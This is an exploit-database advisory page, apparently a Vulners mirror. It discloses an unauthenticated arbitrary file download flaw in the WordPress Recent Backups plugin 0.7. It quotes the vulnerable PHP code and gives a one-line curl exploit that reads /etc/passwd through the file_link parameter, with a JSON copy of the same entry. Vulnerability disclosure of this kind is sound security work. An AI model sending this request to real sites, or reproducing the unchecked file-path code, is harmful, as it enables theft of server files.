Search...

WordPress Recent Backups Plugin 0.7 - Arbitrary File Download

2015-08-10T00:00:00

ID EDB-ID:37752
Type exploitdb
Reporter Larry W. Cashdollar
Modified 2015-08-10T00:00:00

Description

WordPress Recent Backups Plugin 0.7 - Arbitrary File Download. Webapps exploit for php platform

                                        
                                            Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin
Author: Larry W. Cashdollar, @_larry0
Date: 2015-07-13
Download Site: https://wordpress.org/plugins/recent-backups
Vendor: https://profiles.wordpress.org/andycheeseman/
Vendor Notified: 0000-00-00
Vendor Contact: plugins@wordpress.org
Description: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.
Vulnerability:
The code in  download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded.  This vulnerability can be used
to download sensitive system files:

     2  $file = $_GET['file_link'];
     3  
     4  if (file_exists($file)) {
     5      header('Content-Description: File Transfer');
     6      header('Content-Type: application/octet-stream');
     7      header('Content-Disposition: attachment; filename='.basename($file));
     8      header('Content-Transfer-Encoding: binary');
     9      header('Expires: 0');
    10      header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    11      header('Pragma: public');
    12      header('Content-Length: ' . filesize($file));
    13      ob_clean();
    14      flush();
    15      readfile($file);

CVEID:
OSVDB:
Exploit Code:
  â˘ $ curl -v "http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd

JSON Vulners Source

Initial Source

{"id": "EDB-ID:37752", "type": "exploitdb", "bulletinFamily": "exploit", "title": "WordPress Recent Backups Plugin 0.7 - Arbitrary File Download", "description": "WordPress Recent Backups Plugin 0.7 - Arbitrary File Download. Webapps exploit for php platform", "published": "2015-08-10T00:00:00", "modified": "2015-08-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/37752/", "reporter": "Larry W. Cashdollar", "references": [], "cvelist": [], "lastseen": "2016-02-04T06:30:28", "viewCount": 9, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2016-02-04T06:30:28", "rev": 2}, "dependencies": {"references": [], "modified": "2016-02-04T06:30:28", "rev": 2}, "vulnersScore": -0.5}, "sourceHref": "https://www.exploit-db.com/download/37752/", "sourceData": "Title: Remote file download vulnerability in recent-backups v0.7 wordpress plugin\r\nAuthor: Larry W. Cashdollar, @_larry0\r\nDate: 2015-07-13\r\nDownload Site: https://wordpress.org/plugins/recent-backups\r\nVendor: https://profiles.wordpress.org/andycheeseman/\r\nVendor Notified: 0000-00-00\r\nVendor Contact: plugins@wordpress.org\r\nDescription: To be used with the BackupWordPress plugin to list the contents of the backup directory in a dashboard widget.\r\nVulnerability:\r\nThe code in download-file.php doesn't verify the user is logged in or sanitize what files can be downloaded. This vulnerability can be used\r\nto download sensitive system files:\r\n\r\n 2 $file = $_GET['file_link'];\r\n 3 \r\n 4 if (file_exists($file)) {\r\n 5 header('Content-Description: File Transfer');\r\n 6 header('Content-Type: application/octet-stream');\r\n 7 header('Content-Disposition: attachment; filename='.basename($file));\r\n 8 header('Content-Transfer-Encoding: binary');\r\n 9 header('Expires: 0');\r\n 10 header('Cache-Control: must-revalidate, post-check=0, pre-check=0');\r\n 11 header('Pragma: public');\r\n 12 header('Content-Length: ' . filesize($file));\r\n 13 ob_clean();\r\n 14 flush();\r\n 15 readfile($file);\r\n\r\nCVEID:\r\nOSVDB:\r\nExploit Code:\r\n \u00e2\u0080\u02d8 $ curl -v \"http://server/wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd", "osvdbidlist": ["124792"]}